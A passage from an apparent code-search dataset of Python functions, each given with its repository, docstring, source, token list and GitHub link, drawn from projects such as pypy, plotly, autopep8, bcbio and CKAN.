"False",
")",
":",
"for",
"sender",
"in",
"self",
".",
"active_senders",
":",
"sender",
".",
"add_dynamic_metric",
"(",
"discovery_key",
",",
"macro_string",
",",
"macro_array",
",",
"host",
",",
"synthetic",
")"
] |
https://github.com/openshift/openshift-tools/blob/1188778e728a6e4781acf728123e5b356380fe6f/openshift_tools/monitoring/metric_sender.py#L75-L78
|
||
mesalock-linux/mesapy
|
ed546d59a21b36feb93e2309d5c6b75aa0ad95c9
|
lib-python/2.7/decimal.py
|
python
|
Decimal.__float__
|
(self)
|
return float(s)
|
Float representation.
|
Float representation.
|
[
"Float",
"representation",
"."
] |
def __float__(self):
"""Float representation."""
if self._isnan():
if self.is_snan():
raise ValueError("Cannot convert signaling NaN to float")
s = "-nan" if self._sign else "nan"
else:
s = str(self)
return float(s)
|
[
"def",
"__float__",
"(",
"self",
")",
":",
"if",
"self",
".",
"_isnan",
"(",
")",
":",
"if",
"self",
".",
"is_snan",
"(",
")",
":",
"raise",
"ValueError",
"(",
"\"Cannot convert signaling NaN to float\"",
")",
"s",
"=",
"\"-nan\"",
"if",
"self",
".",
"_sign",
"else",
"\"nan\"",
"else",
":",
"s",
"=",
"str",
"(",
"self",
")",
"return",
"float",
"(",
"s",
")"
] |
https://github.com/mesalock-linux/mesapy/blob/ed546d59a21b36feb93e2309d5c6b75aa0ad95c9/lib-python/2.7/decimal.py#L1580-L1588
|
|
buke/GreenOdoo
|
3d8c55d426fb41fdb3f2f5a1533cfe05983ba1df
|
source/addons/resource/resource.py
|
python
|
resource_calendar._interval_hours_get
|
(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None)
|
return self.get_working_hours(
cr, uid, id, dt_from, dt_to,
compute_leaves=(not exclude_leaves), resource_id=resource_id,
default_interval=(8, 16), context=context)
|
Computes working hours between two dates, taking always same hour/minuts.
:deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3,
now resets hour/minuts. Now counts leave hours instead of all-day leaves.
|
Computes working hours between two dates, taking always same hour/minuts.
|
[
"Computes",
"working",
"hours",
"between",
"two",
"dates",
"taking",
"always",
"same",
"hour",
"/",
"minuts",
"."
] |
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Computes working hours between two dates, taking always same hour/minuts.
:deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3,
now resets hour/minuts. Now counts leave hours instead of all-day leaves."""
return self.get_working_hours(
cr, uid, id, dt_from, dt_to,
compute_leaves=(not exclude_leaves), resource_id=resource_id,
default_interval=(8, 16), context=context)
|
[
"def",
"_interval_hours_get",
"(",
"self",
",",
"cr",
",",
"uid",
",",
"id",
",",
"dt_from",
",",
"dt_to",
",",
"resource_id",
"=",
"False",
",",
"timezone_from_uid",
"=",
"None",
",",
"exclude_leaves",
"=",
"True",
",",
"context",
"=",
"None",
")",
":",
"return",
"self",
".",
"get_working_hours",
"(",
"cr",
",",
"uid",
",",
"id",
",",
"dt_from",
",",
"dt_to",
",",
"compute_leaves",
"=",
"(",
"not",
"exclude_leaves",
")",
",",
"resource_id",
"=",
"resource_id",
",",
"default_interval",
"=",
"(",
"8",
",",
"16",
")",
",",
"context",
"=",
"context",
")"
] |
https://github.com/buke/GreenOdoo/blob/3d8c55d426fb41fdb3f2f5a1533cfe05983ba1df/source/addons/resource/resource.py#L627-L635
|
|
mozillazg/pypy
|
2ff5cd960c075c991389f842c6d59e71cf0cb7d0
|
rpython/translator/driver.py
|
python
|
TranslationDriver.create_exe
|
(self)
|
Copy the compiled executable into current directory, which is
pypy/goal on nightly builds
|
Copy the compiled executable into current directory, which is
pypy/goal on nightly builds
|
[
"Copy",
"the",
"compiled",
"executable",
"into",
"current",
"directory",
"which",
"is",
"pypy",
"/",
"goal",
"on",
"nightly",
"builds"
] |
def create_exe(self):
""" Copy the compiled executable into current directory, which is
pypy/goal on nightly builds
"""
if self.exe_name is not None:
exename = self.c_entryp
newexename = py.path.local(exename.basename)
shutil_copy(str(exename), str(newexename))
self.log.info("copied: %s to %s" % (exename, newexename,))
if self.cbuilder.shared_library_name is not None:
soname = self.cbuilder.shared_library_name
newsoname = newexename.new(basename=soname.basename)
shutil_copy(str(soname), str(newsoname))
self.log.info("copied: %s to %s" % (soname, newsoname,))
if hasattr(self.cbuilder, 'executable_name_w'):
# Copy pypyw.exe
exename_w = self.cbuilder.executable_name_w
newexename_w = py.path.local(exename_w.basename)
self.log.info("copied: %s to %s" % (exename_w, newexename_w,))
shutil_copy(str(exename_w), str(newexename_w))
# for pypy, the import library is renamed and moved to
# libs/python32.lib, according to the pragma in pyconfig.h
libname = self.config.translation.libname
oldlibname = soname.new(ext='lib')
if not libname:
libname = oldlibname.basename
libname = str(newsoname.dirpath().join(libname))
shutil.copyfile(str(oldlibname), libname)
self.log.info("copied: %s to %s" % (oldlibname, libname,))
# the pdb file goes in the same place as pypy(w).exe
ext_to_copy = ['pdb',]
for ext in ext_to_copy:
name = soname.new(ext=ext)
newname = newexename.new(basename=soname.basename)
shutil.copyfile(str(name), str(newname.new(ext=ext)))
self.log.info("copied: %s" % (newname,))
# HACK: copy libcffi-*.dll which is required for venvs
# At some point, we should stop doing this, and instead
# use the artifact from packaging the build instead
libffi = py.path.local.sysfind('libffi-8.dll')
if sys.platform == 'win32' and not libffi:
raise RuntimeError('could not find libffi')
elif libffi:
# in tests, we can mock using windows without libffi
shutil.copyfile(str(libffi), os.getcwd() + r'\libffi-8.dll')
self.c_entryp = newexename
self.log.info("created: %s" % (self.c_entryp,))
|
[
"def",
"create_exe",
"(",
"self",
")",
":",
"if",
"self",
".",
"exe_name",
"is",
"not",
"None",
":",
"exename",
"=",
"self",
".",
"c_entryp",
"newexename",
"=",
"py",
".",
"path",
".",
"local",
"(",
"exename",
".",
"basename",
")",
"shutil_copy",
"(",
"str",
"(",
"exename",
")",
",",
"str",
"(",
"newexename",
")",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"exename",
",",
"newexename",
",",
")",
")",
"if",
"self",
".",
"cbuilder",
".",
"shared_library_name",
"is",
"not",
"None",
":",
"soname",
"=",
"self",
".",
"cbuilder",
".",
"shared_library_name",
"newsoname",
"=",
"newexename",
".",
"new",
"(",
"basename",
"=",
"soname",
".",
"basename",
")",
"shutil_copy",
"(",
"str",
"(",
"soname",
")",
",",
"str",
"(",
"newsoname",
")",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"soname",
",",
"newsoname",
",",
")",
")",
"if",
"hasattr",
"(",
"self",
".",
"cbuilder",
",",
"'executable_name_w'",
")",
":",
"# Copy pypyw.exe",
"exename_w",
"=",
"self",
".",
"cbuilder",
".",
"executable_name_w",
"newexename_w",
"=",
"py",
".",
"path",
".",
"local",
"(",
"exename_w",
".",
"basename",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"exename_w",
",",
"newexename_w",
",",
")",
")",
"shutil_copy",
"(",
"str",
"(",
"exename_w",
")",
",",
"str",
"(",
"newexename_w",
")",
")",
"# for pypy, the import library is renamed and moved to",
"# libs/python32.lib, according to the pragma in pyconfig.h",
"libname",
"=",
"self",
".",
"config",
".",
"translation",
".",
"libname",
"oldlibname",
"=",
"soname",
".",
"new",
"(",
"ext",
"=",
"'lib'",
")",
"if",
"not",
"libname",
":",
"libname",
"=",
"oldlibname",
".",
"basename",
"libname",
"=",
"str",
"(",
"newsoname",
".",
"dirpath",
"(",
")",
".",
"join",
"(",
"libname",
")",
")",
"shutil",
".",
"copyfile",
"(",
"str",
"(",
"oldlibname",
")",
",",
"libname",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"oldlibname",
",",
"libname",
",",
")",
")",
"# the pdb file goes in the same place as pypy(w).exe",
"ext_to_copy",
"=",
"[",
"'pdb'",
",",
"]",
"for",
"ext",
"in",
"ext_to_copy",
":",
"name",
"=",
"soname",
".",
"new",
"(",
"ext",
"=",
"ext",
")",
"newname",
"=",
"newexename",
".",
"new",
"(",
"basename",
"=",
"soname",
".",
"basename",
")",
"shutil",
".",
"copyfile",
"(",
"str",
"(",
"name",
")",
",",
"str",
"(",
"newname",
".",
"new",
"(",
"ext",
"=",
"ext",
")",
")",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s\"",
"%",
"(",
"newname",
",",
")",
")",
"# HACK: copy libcffi-*.dll which is required for venvs",
"# At some point, we should stop doing this, and instead",
"# use the artifact from packaging the build instead",
"libffi",
"=",
"py",
".",
"path",
".",
"local",
".",
"sysfind",
"(",
"'libffi-8.dll'",
")",
"if",
"sys",
".",
"platform",
"==",
"'win32'",
"and",
"not",
"libffi",
":",
"raise",
"RuntimeError",
"(",
"'could not find libffi'",
")",
"elif",
"libffi",
":",
"# in tests, we can mock using windows without libffi",
"shutil",
".",
"copyfile",
"(",
"str",
"(",
"libffi",
")",
",",
"os",
".",
"getcwd",
"(",
")",
"+",
"r'\\libffi-8.dll'",
")",
"self",
".",
"c_entryp",
"=",
"newexename",
"self",
".",
"log",
".",
"info",
"(",
"\"created: %s\"",
"%",
"(",
"self",
".",
"c_entryp",
",",
")",
")"
] |
https://github.com/mozillazg/pypy/blob/2ff5cd960c075c991389f842c6d59e71cf0cb7d0/rpython/translator/driver.py#L476-L522
|
||
microsoft/debugpy
|
be8dd607f6837244e0b565345e497aff7a0c08bf
|
src/debugpy/_vendored/pydevd/third_party/pep8/autopep8.py
|
python
|
shorten_comment
|
(line, max_line_length, last_comment=False)
|
Return trimmed or split long comment line.
If there are no comments immediately following it, do a text wrap.
Doing this wrapping on all comments in general would lead to jagged
comment text.
|
Return trimmed or split long comment line.
|
[
"Return",
"trimmed",
"or",
"split",
"long",
"comment",
"line",
"."
] |
def shorten_comment(line, max_line_length, last_comment=False):
"""Return trimmed or split long comment line.
If there are no comments immediately following it, do a text wrap.
Doing this wrapping on all comments in general would lead to jagged
comment text.
"""
assert len(line) > max_line_length
line = line.rstrip()
# PEP 8 recommends 72 characters for comment text.
indentation = _get_indentation(line) + '# '
max_line_length = min(max_line_length,
len(indentation) + 72)
MIN_CHARACTER_REPEAT = 5
if (
len(line) - len(line.rstrip(line[-1])) >= MIN_CHARACTER_REPEAT and
not line[-1].isalnum()
):
# Trim comments that end with things like ---------
return line[:max_line_length] + '\n'
elif last_comment and re.match(r'\s*#+\s*\w+', line):
split_lines = textwrap.wrap(line.lstrip(' \t#'),
initial_indent=indentation,
subsequent_indent=indentation,
width=max_line_length,
break_long_words=False,
break_on_hyphens=False)
return '\n'.join(split_lines) + '\n'
else:
return line + '\n'
|
[
"def",
"shorten_comment",
"(",
"line",
",",
"max_line_length",
",",
"last_comment",
"=",
"False",
")",
":",
"assert",
"len",
"(",
"line",
")",
">",
"max_line_length",
"line",
"=",
"line",
".",
"rstrip",
"(",
")",
"# PEP 8 recommends 72 characters for comment text.",
"indentation",
"=",
"_get_indentation",
"(",
"line",
")",
"+",
"'# '",
"max_line_length",
"=",
"min",
"(",
"max_line_length",
",",
"len",
"(",
"indentation",
")",
"+",
"72",
")",
"MIN_CHARACTER_REPEAT",
"=",
"5",
"if",
"(",
"len",
"(",
"line",
")",
"-",
"len",
"(",
"line",
".",
"rstrip",
"(",
"line",
"[",
"-",
"1",
"]",
")",
")",
">=",
"MIN_CHARACTER_REPEAT",
"and",
"not",
"line",
"[",
"-",
"1",
"]",
".",
"isalnum",
"(",
")",
")",
":",
"# Trim comments that end with things like ---------",
"return",
"line",
"[",
":",
"max_line_length",
"]",
"+",
"'\\n'",
"elif",
"last_comment",
"and",
"re",
".",
"match",
"(",
"r'\\s*#+\\s*\\w+'",
",",
"line",
")",
":",
"split_lines",
"=",
"textwrap",
".",
"wrap",
"(",
"line",
".",
"lstrip",
"(",
"' \\t#'",
")",
",",
"initial_indent",
"=",
"indentation",
",",
"subsequent_indent",
"=",
"indentation",
",",
"width",
"=",
"max_line_length",
",",
"break_long_words",
"=",
"False",
",",
"break_on_hyphens",
"=",
"False",
")",
"return",
"'\\n'",
".",
"join",
"(",
"split_lines",
")",
"+",
"'\\n'",
"else",
":",
"return",
"line",
"+",
"'\\n'"
] |
https://github.com/microsoft/debugpy/blob/be8dd607f6837244e0b565345e497aff7a0c08bf/src/debugpy/_vendored/pydevd/third_party/pep8/autopep8.py#L2927-L2959
|
||
mtivadar/qiew
|
87a3b96b43f1745a6b3f1fcfebce5164d2a40a14
|
plugins/format/binary.py
|
python
|
Binary.getBanners
|
(self)
|
return [Banners.FileAddrBanner(self.dataModel, self._viewMode), Banners.TopBanner(self.dataModel, self._viewMode), Banners.BottomBanner(self.dataModel, self._viewMode)]
|
[] |
def getBanners(self):
return [Banners.FileAddrBanner(self.dataModel, self._viewMode), Banners.TopBanner(self.dataModel, self._viewMode), Banners.BottomBanner(self.dataModel, self._viewMode)]
|
[
"def",
"getBanners",
"(",
"self",
")",
":",
"return",
"[",
"Banners",
".",
"FileAddrBanner",
"(",
"self",
".",
"dataModel",
",",
"self",
".",
"_viewMode",
")",
",",
"Banners",
".",
"TopBanner",
"(",
"self",
".",
"dataModel",
",",
"self",
".",
"_viewMode",
")",
",",
"Banners",
".",
"BottomBanner",
"(",
"self",
".",
"dataModel",
",",
"self",
".",
"_viewMode",
")",
"]"
] |
https://github.com/mtivadar/qiew/blob/87a3b96b43f1745a6b3f1fcfebce5164d2a40a14/plugins/format/binary.py#L48-L49
|
|||
opendevops-cn/opendevops
|
538dc9b93bd7c08f36a2d6a7eb8df848f7d7f3d0
|
scripts/tornado_source_code/tornado/autoreload.py
|
python
|
add_reload_hook
|
(fn: Callable[[], None])
|
Add a function to be called before reloading the process.
Note that for open file and socket handles it is generally
preferable to set the ``FD_CLOEXEC`` flag (using `fcntl` or
``tornado.platform.auto.set_close_exec``) instead
of using a reload hook to close them.
|
Add a function to be called before reloading the process.
|
[
"Add",
"a",
"function",
"to",
"be",
"called",
"before",
"reloading",
"the",
"process",
"."
] |
def add_reload_hook(fn: Callable[[], None]) -> None:
"""Add a function to be called before reloading the process.
Note that for open file and socket handles it is generally
preferable to set the ``FD_CLOEXEC`` flag (using `fcntl` or
``tornado.platform.auto.set_close_exec``) instead
of using a reload hook to close them.
"""
_reload_hooks.append(fn)
|
[
"def",
"add_reload_hook",
"(",
"fn",
":",
"Callable",
"[",
"[",
"]",
",",
"None",
"]",
")",
"->",
"None",
":",
"_reload_hooks",
".",
"append",
"(",
"fn",
")"
] |
https://github.com/opendevops-cn/opendevops/blob/538dc9b93bd7c08f36a2d6a7eb8df848f7d7f3d0/scripts/tornado_source_code/tornado/autoreload.py#L156-L164
|
||
bcbio/bcbio-nextgen
|
c80f9b6b1be3267d1f981b7035e3b72441d258f2
|
bcbio/cwl/workflow.py
|
python
|
_merge_wf_inputs
|
(new, out, wf_outputs, to_ignore, parallel, nested_inputs)
|
return out, remapped_new
|
Merge inputs for a sub-workflow, adding any not present inputs in out.
Skips inputs that are internally generated or generated and ignored, keeping
only as inputs those that we do not generate internally.
|
Merge inputs for a sub-workflow, adding any not present inputs in out.
|
[
"Merge",
"inputs",
"for",
"a",
"sub",
"-",
"workflow",
"adding",
"any",
"not",
"present",
"inputs",
"in",
"out",
"."
] |
def _merge_wf_inputs(new, out, wf_outputs, to_ignore, parallel, nested_inputs):
"""Merge inputs for a sub-workflow, adding any not present inputs in out.
Skips inputs that are internally generated or generated and ignored, keeping
only as inputs those that we do not generate internally.
"""
internal_generated_ids = []
for vignore in to_ignore:
vignore_id = _get_string_vid(vignore)
# ignore anything we generate internally, but not those we need to pull in
# from the external process
if vignore_id not in [v["id"] for v in wf_outputs]:
internal_generated_ids.append(vignore_id)
ignore_ids = set(internal_generated_ids + [v["id"] for v in wf_outputs])
cur_ids = set([v["id"] for v in out])
remapped_new = []
for v in new:
remapped_v = copy.deepcopy(v)
outv = copy.deepcopy(v)
outv["id"] = get_base_id(v["id"])
outv["source"] = v["id"]
if outv["id"] not in cur_ids and outv["id"] not in ignore_ids:
if nested_inputs and v["id"] in nested_inputs:
outv = _flatten_nested_input(outv)
out.append(outv)
if remapped_v["id"] in set([v["source"] for v in out]):
remapped_v["source"] = get_base_id(remapped_v["id"])
remapped_new.append(remapped_v)
return out, remapped_new
|
[
"def",
"_merge_wf_inputs",
"(",
"new",
",",
"out",
",",
"wf_outputs",
",",
"to_ignore",
",",
"parallel",
",",
"nested_inputs",
")",
":",
"internal_generated_ids",
"=",
"[",
"]",
"for",
"vignore",
"in",
"to_ignore",
":",
"vignore_id",
"=",
"_get_string_vid",
"(",
"vignore",
")",
"# ignore anything we generate internally, but not those we need to pull in",
"# from the external process",
"if",
"vignore_id",
"not",
"in",
"[",
"v",
"[",
"\"id\"",
"]",
"for",
"v",
"in",
"wf_outputs",
"]",
":",
"internal_generated_ids",
".",
"append",
"(",
"vignore_id",
")",
"ignore_ids",
"=",
"set",
"(",
"internal_generated_ids",
"+",
"[",
"v",
"[",
"\"id\"",
"]",
"for",
"v",
"in",
"wf_outputs",
"]",
")",
"cur_ids",
"=",
"set",
"(",
"[",
"v",
"[",
"\"id\"",
"]",
"for",
"v",
"in",
"out",
"]",
")",
"remapped_new",
"=",
"[",
"]",
"for",
"v",
"in",
"new",
":",
"remapped_v",
"=",
"copy",
".",
"deepcopy",
"(",
"v",
")",
"outv",
"=",
"copy",
".",
"deepcopy",
"(",
"v",
")",
"outv",
"[",
"\"id\"",
"]",
"=",
"get_base_id",
"(",
"v",
"[",
"\"id\"",
"]",
")",
"outv",
"[",
"\"source\"",
"]",
"=",
"v",
"[",
"\"id\"",
"]",
"if",
"outv",
"[",
"\"id\"",
"]",
"not",
"in",
"cur_ids",
"and",
"outv",
"[",
"\"id\"",
"]",
"not",
"in",
"ignore_ids",
":",
"if",
"nested_inputs",
"and",
"v",
"[",
"\"id\"",
"]",
"in",
"nested_inputs",
":",
"outv",
"=",
"_flatten_nested_input",
"(",
"outv",
")",
"out",
".",
"append",
"(",
"outv",
")",
"if",
"remapped_v",
"[",
"\"id\"",
"]",
"in",
"set",
"(",
"[",
"v",
"[",
"\"source\"",
"]",
"for",
"v",
"in",
"out",
"]",
")",
":",
"remapped_v",
"[",
"\"source\"",
"]",
"=",
"get_base_id",
"(",
"remapped_v",
"[",
"\"id\"",
"]",
")",
"remapped_new",
".",
"append",
"(",
"remapped_v",
")",
"return",
"out",
",",
"remapped_new"
] |
https://github.com/bcbio/bcbio-nextgen/blob/c80f9b6b1be3267d1f981b7035e3b72441d258f2/bcbio/cwl/workflow.py#L72-L100
|
|
keon/algorithms
|
23d4e85a506eaeaff315e855be12f8dbe47a7ec3
|
algorithms/tree/segment_tree/iterative_segment_tree.py
|
python
|
SegmentTree.build_tree
|
(self)
|
[] |
def build_tree(self):
for i in range(self.size - 1, 0, -1):
self.tree[i] = self.fn(self.tree[i * 2], self.tree[i * 2 + 1])
|
[
"def",
"build_tree",
"(",
"self",
")",
":",
"for",
"i",
"in",
"range",
"(",
"self",
".",
"size",
"-",
"1",
",",
"0",
",",
"-",
"1",
")",
":",
"self",
".",
"tree",
"[",
"i",
"]",
"=",
"self",
".",
"fn",
"(",
"self",
".",
"tree",
"[",
"i",
"*",
"2",
"]",
",",
"self",
".",
"tree",
"[",
"i",
"*",
"2",
"+",
"1",
"]",
")"
] |
https://github.com/keon/algorithms/blob/23d4e85a506eaeaff315e855be12f8dbe47a7ec3/algorithms/tree/segment_tree/iterative_segment_tree.py#L33-L35
|
||||
pantsbuild/pex
|
473c6ac732ed4bc338b4b20a9ec930d1d722c9b4
|
pex/vendor/_vendored/pip/pip/_vendor/pep517/wrappers.py
|
python
|
HookMissing.__init__
|
(self, hook_name)
|
[] |
def __init__(self, hook_name):
super(HookMissing, self).__init__(hook_name)
self.hook_name = hook_name
|
[
"def",
"__init__",
"(",
"self",
",",
"hook_name",
")",
":",
"super",
"(",
"HookMissing",
",",
"self",
")",
".",
"__init__",
"(",
"hook_name",
")",
"self",
".",
"hook_name",
"=",
"hook_name"
] |
https://github.com/pantsbuild/pex/blob/473c6ac732ed4bc338b4b20a9ec930d1d722c9b4/pex/vendor/_vendored/pip/pip/_vendor/pep517/wrappers.py#L58-L60
|
||||
plotly/plotly.py
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
packages/python/plotly/plotly/figure_factory/utils.py
|
python
|
annotation_dict_for_label
|
(
text,
lane,
num_of_lanes,
subplot_spacing,
row_col="col",
flipped=True,
right_side=True,
text_color="#0f0f0f",
)
|
return annotation_dict
|
Returns annotation dict for label of n labels of a 1xn or nx1 subplot.
:param (str) text: the text for a label.
:param (int) lane: the label number for text. From 1 to n inclusive.
:param (int) num_of_lanes: the number 'n' of rows or columns in subplot.
:param (float) subplot_spacing: the value for the horizontal_spacing and
vertical_spacing params in your plotly.tools.make_subplots() call.
:param (str) row_col: choose whether labels are placed along rows or
columns.
:param (bool) flipped: flips text by 90 degrees. Text is printed
horizontally if set to True and row_col='row', or if False and
row_col='col'.
:param (bool) right_side: only applicable if row_col is set to 'row'.
:param (str) text_color: color of the text.
|
Returns annotation dict for label of n labels of a 1xn or nx1 subplot.
|
[
"Returns",
"annotation",
"dict",
"for",
"label",
"of",
"n",
"labels",
"of",
"a",
"1xn",
"or",
"nx1",
"subplot",
"."
] |
def annotation_dict_for_label(
text,
lane,
num_of_lanes,
subplot_spacing,
row_col="col",
flipped=True,
right_side=True,
text_color="#0f0f0f",
):
"""
Returns annotation dict for label of n labels of a 1xn or nx1 subplot.
:param (str) text: the text for a label.
:param (int) lane: the label number for text. From 1 to n inclusive.
:param (int) num_of_lanes: the number 'n' of rows or columns in subplot.
:param (float) subplot_spacing: the value for the horizontal_spacing and
vertical_spacing params in your plotly.tools.make_subplots() call.
:param (str) row_col: choose whether labels are placed along rows or
columns.
:param (bool) flipped: flips text by 90 degrees. Text is printed
horizontally if set to True and row_col='row', or if False and
row_col='col'.
:param (bool) right_side: only applicable if row_col is set to 'row'.
:param (str) text_color: color of the text.
"""
l = (1 - (num_of_lanes - 1) * subplot_spacing) / (num_of_lanes)
if not flipped:
xanchor = "center"
yanchor = "middle"
if row_col == "col":
x = (lane - 1) * (l + subplot_spacing) + 0.5 * l
y = 1.03
textangle = 0
elif row_col == "row":
y = (lane - 1) * (l + subplot_spacing) + 0.5 * l
x = 1.03
textangle = 90
else:
if row_col == "col":
xanchor = "center"
yanchor = "bottom"
x = (lane - 1) * (l + subplot_spacing) + 0.5 * l
y = 1.0
textangle = 270
elif row_col == "row":
yanchor = "middle"
y = (lane - 1) * (l + subplot_spacing) + 0.5 * l
if right_side:
x = 1.0
xanchor = "left"
else:
x = -0.01
xanchor = "right"
textangle = 0
annotation_dict = dict(
textangle=textangle,
xanchor=xanchor,
yanchor=yanchor,
x=x,
y=y,
showarrow=False,
xref="paper",
yref="paper",
text=text,
font=dict(size=13, color=text_color),
)
return annotation_dict
|
[
"def",
"annotation_dict_for_label",
"(",
"text",
",",
"lane",
",",
"num_of_lanes",
",",
"subplot_spacing",
",",
"row_col",
"=",
"\"col\"",
",",
"flipped",
"=",
"True",
",",
"right_side",
"=",
"True",
",",
"text_color",
"=",
"\"#0f0f0f\"",
",",
")",
":",
"l",
"=",
"(",
"1",
"-",
"(",
"num_of_lanes",
"-",
"1",
")",
"*",
"subplot_spacing",
")",
"/",
"(",
"num_of_lanes",
")",
"if",
"not",
"flipped",
":",
"xanchor",
"=",
"\"center\"",
"yanchor",
"=",
"\"middle\"",
"if",
"row_col",
"==",
"\"col\"",
":",
"x",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"y",
"=",
"1.03",
"textangle",
"=",
"0",
"elif",
"row_col",
"==",
"\"row\"",
":",
"y",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"x",
"=",
"1.03",
"textangle",
"=",
"90",
"else",
":",
"if",
"row_col",
"==",
"\"col\"",
":",
"xanchor",
"=",
"\"center\"",
"yanchor",
"=",
"\"bottom\"",
"x",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"y",
"=",
"1.0",
"textangle",
"=",
"270",
"elif",
"row_col",
"==",
"\"row\"",
":",
"yanchor",
"=",
"\"middle\"",
"y",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"if",
"right_side",
":",
"x",
"=",
"1.0",
"xanchor",
"=",
"\"left\"",
"else",
":",
"x",
"=",
"-",
"0.01",
"xanchor",
"=",
"\"right\"",
"textangle",
"=",
"0",
"annotation_dict",
"=",
"dict",
"(",
"textangle",
"=",
"textangle",
",",
"xanchor",
"=",
"xanchor",
",",
"yanchor",
"=",
"yanchor",
",",
"x",
"=",
"x",
",",
"y",
"=",
"y",
",",
"showarrow",
"=",
"False",
",",
"xref",
"=",
"\"paper\"",
",",
"yref",
"=",
"\"paper\"",
",",
"text",
"=",
"text",
",",
"font",
"=",
"dict",
"(",
"size",
"=",
"13",
",",
"color",
"=",
"text_color",
")",
",",
")",
"return",
"annotation_dict"
] |
https://github.com/plotly/plotly.py/blob/cfad7862594b35965c0e000813bd7805e8494a5b/packages/python/plotly/plotly/figure_factory/utils.py#L192-L260
|
|
JetBrains/python-skeletons
|
95ad24b666e475998e5d1cc02ed53a2188036167
|
numpy/core/__init__.py
|
python
|
uintc.__divmod__
|
(self, *args, **kwargs)
|
Return divmod(self, value).
|
Return divmod(self, value).
|
[
"Return",
"divmod",
"(",
"self",
"value",
")",
"."
] |
def __divmod__(self, *args, **kwargs): # real signature unknown
""" Return divmod(self, value). """
pass
|
[
"def",
"__divmod__",
"(",
"self",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"# real signature unknown",
"pass"
] |
https://github.com/JetBrains/python-skeletons/blob/95ad24b666e475998e5d1cc02ed53a2188036167/numpy/core/__init__.py#L4627-L4629
|
||
r9y9/deepvoice3_pytorch
|
a5c24624bad314db5a5dcb0ea320fc3623a94f15
|
nikl_preprocess/prepare_metafile.py
|
python
|
pe
|
(cmd, shell=False)
|
return ret
|
Print and execute command on system
|
Print and execute command on system
|
[
"Print",
"and",
"execute",
"command",
"on",
"system"
] |
def pe(cmd, shell=False):
"""
Print and execute command on system
"""
ret = []
for line in execute(cmd, shell=shell):
ret.append(line)
print(line, end="")
return ret
|
[
"def",
"pe",
"(",
"cmd",
",",
"shell",
"=",
"False",
")",
":",
"ret",
"=",
"[",
"]",
"for",
"line",
"in",
"execute",
"(",
"cmd",
",",
"shell",
"=",
"shell",
")",
":",
"ret",
".",
"append",
"(",
"line",
")",
"print",
"(",
"line",
",",
"end",
"=",
"\"\"",
")",
"return",
"ret"
] |
https://github.com/r9y9/deepvoice3_pytorch/blob/a5c24624bad314db5a5dcb0ea320fc3623a94f15/nikl_preprocess/prepare_metafile.py#L20-L28
|
|
ckan/ckan
|
b3b01218ad88ed3fb914b51018abe8b07b07bff3
|
ckan/logic/action/get.py
|
python
|
organization_list_for_user
|
(context, data_dict)
|
return orgs_list
|
Return the organizations that the user has a given permission for.
Specifically it returns the list of organizations that the currently
authorized user has a given permission (for example: "manage_group")
against.
By default this returns the list of organizations that the currently
authorized user is member of, in any capacity.
When a user becomes a member of an organization in CKAN they're given a
"capacity" (sometimes called a "role"), for example "member", "editor" or
"admin".
Each of these roles has certain permissions associated with it. For example
the admin role has the "admin" permission (which means they have permission
to do anything). The editor role has permissions like "create_dataset",
"update_dataset" and "delete_dataset". The member role has the "read"
permission.
This function returns the list of organizations that the authorized user
has a given permission for. For example the list of organizations that the
user is an admin of, or the list of organizations that the user can create
datasets in. This takes account of when permissions cascade down an
organization hierarchy.
:param id: the name or id of the user to get the organization list for
(optional, defaults to the currently authorized user (logged in or via
API key))
:type id: string
:param permission: the permission the user has against the
returned organizations, for example ``"read"`` or ``"create_dataset"``
(optional, default: ``"manage_group"``)
:type permission: string
:param include_dataset_count: include the package_count in each org
(optional, default: ``False``)
:type include_dataset_count: bool
:returns: list of organizations that the user has the given permission for
:rtype: list of dicts
|
Return the organizations that the user has a given permission for.
|
[
"Return",
"the",
"organizations",
"that",
"the",
"user",
"has",
"a",
"given",
"permission",
"for",
"."
] |
def organization_list_for_user(context, data_dict):
'''Return the organizations that the user has a given permission for.
Specifically it returns the list of organizations that the currently
authorized user has a given permission (for example: "manage_group")
against.
By default this returns the list of organizations that the currently
authorized user is member of, in any capacity.
When a user becomes a member of an organization in CKAN they're given a
"capacity" (sometimes called a "role"), for example "member", "editor" or
"admin".
Each of these roles has certain permissions associated with it. For example
the admin role has the "admin" permission (which means they have permission
to do anything). The editor role has permissions like "create_dataset",
"update_dataset" and "delete_dataset". The member role has the "read"
permission.
This function returns the list of organizations that the authorized user
has a given permission for. For example the list of organizations that the
user is an admin of, or the list of organizations that the user can create
datasets in. This takes account of when permissions cascade down an
organization hierarchy.
:param id: the name or id of the user to get the organization list for
(optional, defaults to the currently authorized user (logged in or via
API key))
:type id: string
:param permission: the permission the user has against the
returned organizations, for example ``"read"`` or ``"create_dataset"``
(optional, default: ``"manage_group"``)
:type permission: string
:param include_dataset_count: include the package_count in each org
(optional, default: ``False``)
:type include_dataset_count: bool
:returns: list of organizations that the user has the given permission for
:rtype: list of dicts
'''
model = context['model']
if data_dict.get('id'):
user_obj = model.User.get(data_dict['id'])
if not user_obj:
raise NotFound
user = user_obj.name
else:
user = context['user']
